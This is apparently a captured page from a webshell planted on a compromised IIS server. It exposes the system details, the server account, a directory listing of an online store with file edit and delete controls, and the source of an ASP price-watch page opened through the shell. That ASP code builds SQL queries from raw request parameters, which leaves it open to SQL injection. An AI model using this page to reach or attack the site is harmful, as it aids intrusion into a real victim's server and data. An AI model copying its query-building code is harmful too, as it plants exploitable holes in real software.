Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <!--#include file="conn.asp" --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <script type="text/javascript"> function check() { //������ʽ�ж� //var re = /^[0-9]+.?[0-9]*$/; var re =/^([1-9]\d*|(0|[1-9]\d*)\.\d*[1-9])$/ if (!re.test(document.business.watchprice.value)) { alert("Please enter a correct price"); return false; } return true; } </script> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <% Dim SS(1000,6) Dim ASC365_Cart_001 productid=request.QueryString("productid") typeid1=request.QueryString("typeid") if len(productid)<>6 then productid=request.Form("productid") end if set rs1=server.CreateObject("adodb.recordset") sql1="select * from newproductlist where productid='"&productid&"'" rs1.open sql1,conn,1,1 if not rs1.eof then productname=rs1("productname") rs1.close end if if request("Action")="Addtopricewatch" then Cart_js=0 productid=request.Form("productid") watchprice=request.Form("watchprice") weight=request.Form("weight") selectid=request.Form("select") if selectid=0 then watchprice=0 end if userid=Session("userid") set rs3=server.CreateObject("adodb.recordset") sql3="select * from pricewatch where userid="&userid&" and productid='"&productid&"'" rs3.open sql3,conn,3,3 if rs3.eof and rs3.bof then rs3.addnew rs3("userid")=userid rs3("productid")=productid rs3("targetprice")=watchprice rs3("adddate")=now() rs3("state")=0 rs3.update rs3.close set rs3=nothing else rs3("userid")=userid rs3("productid")=productid rs3("targetprice")=watchprice rs3("adddate")=now() rs3("state")=0 rs3.update rs3.close set rs3=nothing end if end if %> <title><%=productname%></title> <style type="text/css"> <!-- .STYLEd { font-size: 20px; font-weight: bold; font-family: Verdana, Arial, Helvetica, sans-serif; } .STYLE12 { font-family: Verdana, Arial, Helvetica, sans-serif; color:#6C6C6C; } --> </style> </head> <body style="width:1000px; margin:0 auto; text-align:center;background-color:#F1F1F1"> <table style="width:1000px; background-color:#ffffff" border="0"> <tr><td> <% server.Execute("head.asp") %> </td> </tr> <% useremail=Session("useremail") if len(useremail)=0 then session("productid")=productid session("typeid")=typeid1 %> <!--#include file="register2.asp" --> <% else %> <tr> <td align="left" style="height:50px"> <% dim typepath(10,2) typeid=request.QueryString("typeid") if len(typeid)=0 then typeid=request.Form("typeid") end if set rsa=server.CreateObject("adodb.recordset") sqla="select * from menu1 where id="&typeid&"" rsa.open sqla,conn,1,1 fatherpath=split(rsa("ParentPath"),",") if ubound(fatherpath)>0 then for ii=1 to ubound(fatherpath) newid=fatherpath(ii) set rsb=server.CreateObject("adodb.recordset") sqlb="select * from menu1 where id="&newid&"" rsb.open sqlb,conn,1,1 typepath(ii,0)=rsb("id") typepath(ii,1)=rsb("CName") rsb.close next typepath(ii+1,0)=rsa("id") typepath(ii+1,1)=rsa("CName") else typepath(ii,0)=rsa("id") typepath(ii,1)=rsa("CName") end if %> <% for i=0 to 10 if len(typepath(i,0))>0 then %> <a href="productlist.asp?typeid=<%=typepath(i,0)%>"><%=typepath(i,1)%></a><span class="STYLE21">></span> <% end if next %> </td> </tr> <tr> <td valign="top"> <% productid=request.QueryString("Productid") set rs=server.CreateObject("adodb.recordset") sql="select * from newproductlist where productid='"&productid&"'" rs.open sql,conn,1,1 if not rs.eof then %> <table width="1000" border="0" cellpadding="0" cellspacing="0" height="250"> <tr> <form method="post" name="business" action="?Action=Addtopricewatch&productid=<%=rs("productid")%>&typeid=<%=rs("typeid")%>" onSubmit="return check()"> <th width="250" height="250" scope="col"><img src="<%=rs("ImgPrev")%>" border="0" style="width:250px"/></th> <th width="750" scope="col" style="background-color:#CCCCCC;" valign="top"> <table width="650" border="0" cellspacing="0" cellpadding="0" style="text-align:left; margin-left:100px; margin-top:20px"> <tr> <input type="hidden" name="productid" value="<%=rs("productid")%>" /> <th colspan="2" align="left" scope="col"><input type="hidden" name="productname" value="<%=rs("productname")%>" /> <font style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:16px"><%=rs("productid")%>:<%=rs("productname")%></font></th> </tr> <tr> <% newprice=rs("price1") if rs("tejia")=1 then newprice=rs("price2") end if %> <td width="84" height="30">Price:</td> <td width="566"><input type="hidden" name="price" value="<%=newprice%>" /> <%= FormatNumber(newprice, 2, -1)%>$</td> </tr> <tr> <td height="31">Weight:</td> <td><input type="hidden" name="weight" value="<%=rs("weight")%>" /> <%= FormatNumber(rs("weight"), 2, -1)%>kg</td> </tr> <tr> <td colspan="2"><h3>NOTIFY ME OF :</h3> <p><input type="radio" name="select" value="0" checked="checked" /><span class="STYLE12">Notify on any Price Reduction</span></p> <p><input type="radio" name="select" value="1" /><span class="STYLE12">Notify on Target Price:$</span> <input type="text" name="watchprice" size="8" value="<%=newprice%>"/></p> <p><input type="submit" value="save" name="submit" /></p></td> </tr> </table> </form> </th> </tr> </table> <table> <tr> <td valign="top"> <table width="1000" border="0" cellpadding="0" cellspacing="0"> <tr> <td> </br> <div align="center" class="STYLEd">Similar products </div> </br> </td> </tr> <tr> <td> <div style="width:1000px; float:left"> <% set rs1=server.CreateObject("adodb.recordset") sql1="select top 5 * from newproductlist where typeid='"&typeid1&"' and productid <>'"&productid&"'" rs1.open sql1,conn,1,1 do while not rs1.eof %> <div style="width:200px; float:left"> <p><a href="newproductdetail.asp?productid=<%=rs1("productid")%>&typeid=<%=rs1("typeid")%>" target="_blank"><img src="<%=rs1("ImgPrev")%>" border="0" style="width:180px"/></a></p> <p><a href="newproductdetail.asp?productid=<%=rs1("productid")%>&typeid=<%=rs1("typeid")%>" style="text-decoration:none" target="_blank"><%=rs1("productid")%>:<%=rs1("productname")%></a></p> </div> <% rs1.movenext loop %> </td> </tr> </table> <div style="width:800px"></div></td> </tr> </table> <% end if rs.close %> </td> </tr> <% end if %> <tr><td> <% server.Execute("bottom.asp") %> </td></tr> </table> <% conn.close set conn=nothing %> </body> </html>